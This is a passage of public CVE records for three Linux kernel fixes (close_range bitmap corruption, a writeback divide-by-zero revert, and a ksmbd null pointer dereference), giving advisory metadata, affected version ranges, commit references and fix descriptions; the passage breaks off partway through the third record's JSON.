Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-45025",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T15:46:55.387258Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T15:47:10.206Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:15:35.946Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/file.c",
            "include/linux/bitmap.h",
            "tools/testing/selftests/core/close_range_test.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "fe5bf14881701119aeeda7cf685f3c226c7380df",
              "status": "affected",
              "version": "278a5fbaed89dacd04e9d052f4594ffd0e0585de",
              "versionType": "git"
            },
            {
              "lessThan": "5053581fe5dfb09b58c65dd8462bf5dea71f41ff",
              "status": "affected",
              "version": "278a5fbaed89dacd04e9d052f4594ffd0e0585de",
              "versionType": "git"
            },
            {
              "lessThan": "8cad3b2b3ab81ca55f37405ffd1315bcc2948058",
              "status": "affected",
              "version": "278a5fbaed89dacd04e9d052f4594ffd0e0585de",
              "versionType": "git"
            },
            {
              "lessThan": "dd72ae8b0fce9c0bbe9582b9b50820f0407f8d8a",
              "status": "affected",
              "version": "278a5fbaed89dacd04e9d052f4594ffd0e0585de",
              "versionType": "git"
            },
            {
              "lessThan": "c69d18f0ac7060de724511537810f10f29a27958",
              "status": "affected",
              "version": "278a5fbaed89dacd04e9d052f4594ffd0e0585de",
              "versionType": "git"
            },
            {
              "lessThan": "9a2fa1472083580b6c66bdaf291f591e1170123a",
              "status": "affected",
              "version": "278a5fbaed89dacd04e9d052f4594ffd0e0585de",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/file.c",
            "include/linux/bitmap.h",
            "tools/testing/selftests/core/close_range_test.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.9"
            },
            {
              "lessThan": "5.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfix bitmap corruption on close_range() with CLOSE_RANGE_UNSHARE\n\ncopy_fd_bitmaps(new, old, count) is expected to copy the first\ncount/BITS_PER_LONG bits from old-\u003efull_fds_bits[] and fill\nthe rest with zeroes.  What it does is copying enough words\n(BITS_TO_LONGS(count/BITS_PER_LONG)), then memsets the rest.\nThat works fine, *if* all bits past the cutoff point are\nclear.  Otherwise we are risking garbage from the last word\nwe\u0027d copied.\n\nFor most of the callers that is true - expand_fdtable() has\ncount equal to old-\u003emax_fds, so there\u0027s no open descriptors\npast count, let alone fully occupied words in -\u003eopen_fds[],\nwhich is what bits in -\u003efull_fds_bits[] correspond to.\n\nThe other caller (dup_fd()) passes sane_fdtable_size(old_fdt, max_fds),\nwhich is the smallest multiple of BITS_PER_LONG that covers all\nopened descriptors below max_fds.  In the common case (copying on\nfork()) max_fds is ~0U, so all opened descriptors will be below\nit and we are fine, by the same reasons why the call in expand_fdtable()\nis safe.\n\nUnfortunately, there is a case where max_fds is less than that\nand where we might, indeed, end up with junk in -\u003efull_fds_bits[] -\nclose_range(from, to, CLOSE_RANGE_UNSHARE) with\n\t* descriptor table being currently shared\n\t* \u0027to\u0027 being above the current capacity of descriptor table\n\t* \u0027from\u0027 being just under some chunk of opened descriptors.\nIn that case we end up with observably wrong behaviour - e.g. spawn\na child with CLONE_FILES, get all descriptors in range 0..127 open,\nthen close_range(64, ~0U, CLOSE_RANGE_UNSHARE) and watch dup(0) ending\nup with descriptor #128, despite #64 being observably not open.\n\nThe minimally invasive fix would be to deal with that in dup_fd().\nIf this proves to add measurable overhead, we can go that way, but\nlet\u0027s try to fix copy_fd_bitmaps() first.\n\n* new helper: bitmap_copy_and_expand(to, from, bits_to_copy, size).\n* make copy_fd_bitmaps() take the bitmap size in words, rather than\nbits; it\u0027s \u0027count\u0027 argument is always a multiple of BITS_PER_LONG,\nso we are not losing any information, and that way we can use the\nsame helper for all three bitmaps - compiler will see that count\nis a multiple of BITS_PER_LONG for the large ones, so it\u0027ll generate\nplain memcpy()+memset().\n\nReproducer added to tools/testing/selftests/core/close_range_test.c"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-06-19T12:56:38.859Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/fe5bf14881701119aeeda7cf685f3c226c7380df"
        },
        {
          "url": "https://git.kernel.org/stable/c/5053581fe5dfb09b58c65dd8462bf5dea71f41ff"
        },
        {
          "url": "https://git.kernel.org/stable/c/8cad3b2b3ab81ca55f37405ffd1315bcc2948058"
        },
        {
          "url": "https://git.kernel.org/stable/c/dd72ae8b0fce9c0bbe9582b9b50820f0407f8d8a"
        },
        {
          "url": "https://git.kernel.org/stable/c/c69d18f0ac7060de724511537810f10f29a27958"
        },
        {
          "url": "https://git.kernel.org/stable/c/9a2fa1472083580b6c66bdaf291f591e1170123a"
        }
      ],
      "title": "fix bitmap corruption on close_range() with CLOSE_RANGE_UNSHARE",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-45025",
    "datePublished": "2024-09-11T15:13:57.732Z",
    "dateReserved": "2024-08-21T05:34:56.684Z",
    "dateUpdated": "2025-11-03T22:15:35.946Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42102 (GCVE-0-2024-42102)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:45 – Updated: 2025-11-03 22:01

Title

Revert "mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again"

Summary

In the Linux kernel, the following vulnerability has been resolved: Revert "mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again" Patch series "mm: Avoid possible overflows in dirty throttling". Dirty throttling logic assumes dirty limits in page units fit into 32-bits. This patch series makes sure this is true (see patch 2/2 for more details). This patch (of 2): This reverts commit 9319b647902cbd5cc884ac08a8a6d54ce111fc78. The commit is broken in several ways. Firstly, the removed (u64) cast from the multiplication will introduce a multiplication overflow on 32-bit archs if wb_thresh * bg_thresh >= 1<<32 (which is actually common - the default settings with 4GB of RAM will trigger this). Secondly, the div64_u64() is unnecessarily expensive on 32-bit archs. We have div64_ul() in case we want to be safe & cheap. Thirdly, if dirty thresholds are larger than 1<<32 pages, then dirty balancing is going to blow up in many other spectacular ways anyway so trying to fix one possible overflow is just moot.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/253f9ea7e8e53a517…
	https://git.kernel.org/stable/c/23a28f5f3f6ca1e41…
	https://git.kernel.org/stable/c/145faa3d03688cbb7…
	https://git.kernel.org/stable/c/2820005edae13b140…
	https://git.kernel.org/stable/c/cbbe17a324437c0ff…
	https://git.kernel.org/stable/c/f6620df12cb6bdcad…
	https://git.kernel.org/stable/c/000099d71648504fb…
	https://git.kernel.org/stable/c/30139c702048f1097…

Impacted products

Vendor

Product

Version

Linux

Affected: c593d26fb5d577ef31b6e49a31e08ae3ebc1bc1e , < 253f9ea7e8e53a5176bd80ceb174907b10724c1a (git)
Affected: 1f12e4b3284d6c863f272eb2de0d4248ed211cf4 , < 23a28f5f3f6ca1e4184bd0e9631cd0944cf1c807 (git)
Affected: 81e7d2530d458548b90a5c5e76b77ad5e5d1c0df , < 145faa3d03688cbb7bbaaecbd84c01539852942c (git)
Affected: 5099871b370335809c0fd1abad74d9c7c205d43f , < 2820005edae13b140f2d54267d1bd6bb23915f59 (git)
Affected: 16b1025eaa8fc223ab4273ece20d1c3a4211a95d , < cbbe17a324437c0ff99881a3ee453da45b228a00 (git)
Affected: ec18ec230301583395576915d274b407743d8f6c , < f6620df12cb6bdcad671d269debbb23573502f9d (git)
Affected: 9319b647902cbd5cc884ac08a8a6d54ce111fc78 , < 000099d71648504fb9c7a4616f92c2b70c3e44ec (git)
Affected: 9319b647902cbd5cc884ac08a8a6d54ce111fc78 , < 30139c702048f1097342a31302cbd3d478f50c63 (git)
Affected: 65977bed167a92e87085e757fffa5798f7314c9f (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:36.684Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/253f9ea7e8e53a5176bd80ceb174907b10724c1a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/23a28f5f3f6ca1e4184bd0e9631cd0944cf1c807"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/145faa3d03688cbb7bbaaecbd84c01539852942c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2820005edae13b140f2d54267d1bd6bb23915f59"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cbbe17a324437c0ff99881a3ee453da45b228a00"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f6620df12cb6bdcad671d269debbb23573502f9d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/000099d71648504fb9c7a4616f92c2b70c3e44ec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/30139c702048f1097342a31302cbd3d478f50c63"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42102",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:59.274407Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:59.444Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "mm/page-writeback.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "253f9ea7e8e53a5176bd80ceb174907b10724c1a",
              "status": "affected",
              "version": "c593d26fb5d577ef31b6e49a31e08ae3ebc1bc1e",
              "versionType": "git"
            },
            {
              "lessThan": "23a28f5f3f6ca1e4184bd0e9631cd0944cf1c807",
              "status": "affected",
              "version": "1f12e4b3284d6c863f272eb2de0d4248ed211cf4",
              "versionType": "git"
            },
            {
              "lessThan": "145faa3d03688cbb7bbaaecbd84c01539852942c",
              "status": "affected",
              "version": "81e7d2530d458548b90a5c5e76b77ad5e5d1c0df",
              "versionType": "git"
            },
            {
              "lessThan": "2820005edae13b140f2d54267d1bd6bb23915f59",
              "status": "affected",
              "version": "5099871b370335809c0fd1abad74d9c7c205d43f",
              "versionType": "git"
            },
            {
              "lessThan": "cbbe17a324437c0ff99881a3ee453da45b228a00",
              "status": "affected",
              "version": "16b1025eaa8fc223ab4273ece20d1c3a4211a95d",
              "versionType": "git"
            },
            {
              "lessThan": "f6620df12cb6bdcad671d269debbb23573502f9d",
              "status": "affected",
              "version": "ec18ec230301583395576915d274b407743d8f6c",
              "versionType": "git"
            },
            {
              "lessThan": "000099d71648504fb9c7a4616f92c2b70c3e44ec",
              "status": "affected",
              "version": "9319b647902cbd5cc884ac08a8a6d54ce111fc78",
              "versionType": "git"
            },
            {
              "lessThan": "30139c702048f1097342a31302cbd3d478f50c63",
              "status": "affected",
              "version": "9319b647902cbd5cc884ac08a8a6d54ce111fc78",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "65977bed167a92e87085e757fffa5798f7314c9f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "mm/page-writeback.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "4.19.307",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "5.4.269",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "5.10.210",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.15.149",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "6.1.79",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again\"\n\nPatch series \"mm: Avoid possible overflows in dirty throttling\".\n\nDirty throttling logic assumes dirty limits in page units fit into\n32-bits.  This patch series makes sure this is true (see patch 2/2 for\nmore details).\n\n\nThis patch (of 2):\n\nThis reverts commit 9319b647902cbd5cc884ac08a8a6d54ce111fc78.\n\nThe commit is broken in several ways.  Firstly, the removed (u64) cast\nfrom the multiplication will introduce a multiplication overflow on 32-bit\narchs if wb_thresh * bg_thresh \u003e= 1\u003c\u003c32 (which is actually common - the\ndefault settings with 4GB of RAM will trigger this).  Secondly, the\ndiv64_u64() is unnecessarily expensive on 32-bit archs.  We have\ndiv64_ul() in case we want to be safe \u0026 cheap.  Thirdly, if dirty\nthresholds are larger than 1\u003c\u003c32 pages, then dirty balancing is going to\nblow up in many other spectacular ways anyway so trying to fix one\npossible overflow is just moot."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:37.713Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/253f9ea7e8e53a5176bd80ceb174907b10724c1a"
        },
        {
          "url": "https://git.kernel.org/stable/c/23a28f5f3f6ca1e4184bd0e9631cd0944cf1c807"
        },
        {
          "url": "https://git.kernel.org/stable/c/145faa3d03688cbb7bbaaecbd84c01539852942c"
        },
        {
          "url": "https://git.kernel.org/stable/c/2820005edae13b140f2d54267d1bd6bb23915f59"
        },
        {
          "url": "https://git.kernel.org/stable/c/cbbe17a324437c0ff99881a3ee453da45b228a00"
        },
        {
          "url": "https://git.kernel.org/stable/c/f6620df12cb6bdcad671d269debbb23573502f9d"
        },
        {
          "url": "https://git.kernel.org/stable/c/000099d71648504fb9c7a4616f92c2b70c3e44ec"
        },
        {
          "url": "https://git.kernel.org/stable/c/30139c702048f1097342a31302cbd3d478f50c63"
        }
      ],
      "title": "Revert \"mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again\"",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42102",
    "datePublished": "2024-07-30T07:45:58.423Z",
    "dateReserved": "2024-07-29T15:50:41.174Z",
    "dateUpdated": "2025-11-03T22:01:36.684Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46795 (GCVE-0-2024-46795)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:12 – Updated: 2025-11-03 22:18

Title

ksmbd: unset the binding mark of a reused connection

Summary

In the Linux kernel, the following vulnerability has been resolved: ksmbd: unset the binding mark of a reused connection Steve French reported null pointer dereference error from sha256 lib. cifs.ko can send session setup requests on reused connection. If reused connection is used for binding session, conn->binding can still remain true and generate_preauth_hash() will not set sess->Preauth_HashValue and it will be NULL. It is used as a material to create an encryption key in ksmbd_gen_smb311_encryptionkey. ->Preauth_HashValue cause null pointer dereference error from crypto_shash_update(). BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP PTI CPU: 8 PID: 429254 Comm: kworker/8:39 Hardware name: LENOVO 20MAS08500/20MAS08500, BIOS N2CET69W (1.52 ) Workqueue: ksmbd-io handle_ksmbd_work [ksmbd] RIP: 0010:lib_sha256_base_do_update.isra.0+0x11e/0x1d0 [sha256_ssse3] <TASK> ? show_regs+0x6d/0x80 ? __die+0x24/0x80 ? page_fault_oops+0x99/0x1b0 ? do_user_addr_fault+0x2ee/0x6b0 ? exc_page_fault+0x83/0x1b0 ? asm_exc_page_fault+0x27/0x30 ? __pfx_sha256_transform_rorx+0x10/0x10 [sha256_ssse3] ? lib_sha256_base_do_update.isra.0+0x11e/0x1d0 [sha256_ssse3] ? __pfx_sha256_transform_rorx+0x10/0x10 [sha256_ssse3] ? __pfx_sha256_transform_rorx+0x10/0x10 [sha256_ssse3] _sha256_update+0x77/0xa0 [sha256_ssse3] sha256_avx2_update+0x15/0x30 [sha256_ssse3] crypto_shash_update+0x1e/0x40 hmac_update+0x12/0x20 crypto_shash_update+0x1e/0x40 generate_key+0x234/0x380 [ksmbd] generate_smb3encryptionkey+0x40/0x1c0 [ksmbd] ksmbd_gen_smb311_encryptionkey+0x72/0xa0 [ksmbd] ntlm_authenticate.isra.0+0x423/0x5d0 [ksmbd] smb2_sess_setup+0x952/0xaa0 [ksmbd] __process_request+0xa3/0x1d0 [ksmbd] __handle_ksmbd_work+0x1c4/0x2f0 [ksmbd] handle_ksmbd_work+0x2d/0xa0 [ksmbd] process_one_work+0x16c/0x350 worker_thread+0x306/0x440 ? __pfx_worker_thread+0x10/0x10 kthread+0xef/0x120 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x44/0x70 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1b/0x30 </TASK>

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9914f1bd61d5e838b…
	https://git.kernel.org/stable/c/93d54a4b59c4b3d80…
	https://git.kernel.org/stable/c/41bc256da7e47b679…
	https://git.kernel.org/stable/c/4c8496f44f5bb5c06…
	https://git.kernel.org/stable/c/78c5a6f1f630172b1…

Impacted products

Vendor

Product

Version

Linux

Affected: f5a544e3bab78142207e0242d22442db85ba1eff , < 9914f1bd61d5e838bb1ab15a71076d37a6db65d1 (git)
Affected: f5a544e3bab78142207e0242d22442db85ba1eff , < 93d54a4b59c4b3d803d20aa645ab5ca71f3b3b02 (git)
Affected: f5a544e3bab78142207e0242d22442db85ba1eff , < 41bc256da7e47b679df87c7fc7a5b393052b9cce (git)
Affected: f5a544e3bab78142207e0242d22442db85ba1eff , < 4c8496f44f5bb5c06cdef5eb130ab259643392a1 (git)
Affected: f5a544e3bab78142207e0242d22442db85ba1eff , < 78c5a6f1f630172b19af4912e755e1da93ef0ab5 (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46795",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:22:54.579301Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:23:07.842Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:18:37.201Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/server/smb2pdu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9914f1bd61d5e838bb1ab15a71076d37a6db65d1",
              "status": "affected",
              "version": "f5a544e3bab78142207e0242d22442db85ba1eff",
              "versionType": "git"
            },
            {
              "lessThan": "93d54a4b59c4b3d803d20aa645ab5ca71f3b3b02",
              "status": "affected",
              "version": "f5a544e3bab78142207e0242d22442db85ba1eff",
              "versionType": "git"
            },
            {
              "lessThan": "41bc256da7e47b679df87c7fc7a5b393052b9cce",
              "status": "affected",
              "version": "f5a544e3bab78142207e0242d22442db85ba1eff",
              "versionType": "git"
            },
            {
              "lessThan": "4c8496f44f5bb5c06cdef5eb130ab259643392a1",
              "status": "affected",
              "version": "f5a544e3bab78142207e0242d22442db85ba1eff",
              "versionType": "git"
            },
            {
              "lessThan": "78c5a6f1f630172b19af4912e755e1da93ef0ab5",
              "status": "affected",
              "version": "f5a544e3bab78142207e0242d22442db85ba1eff",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/server/smb2pdu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
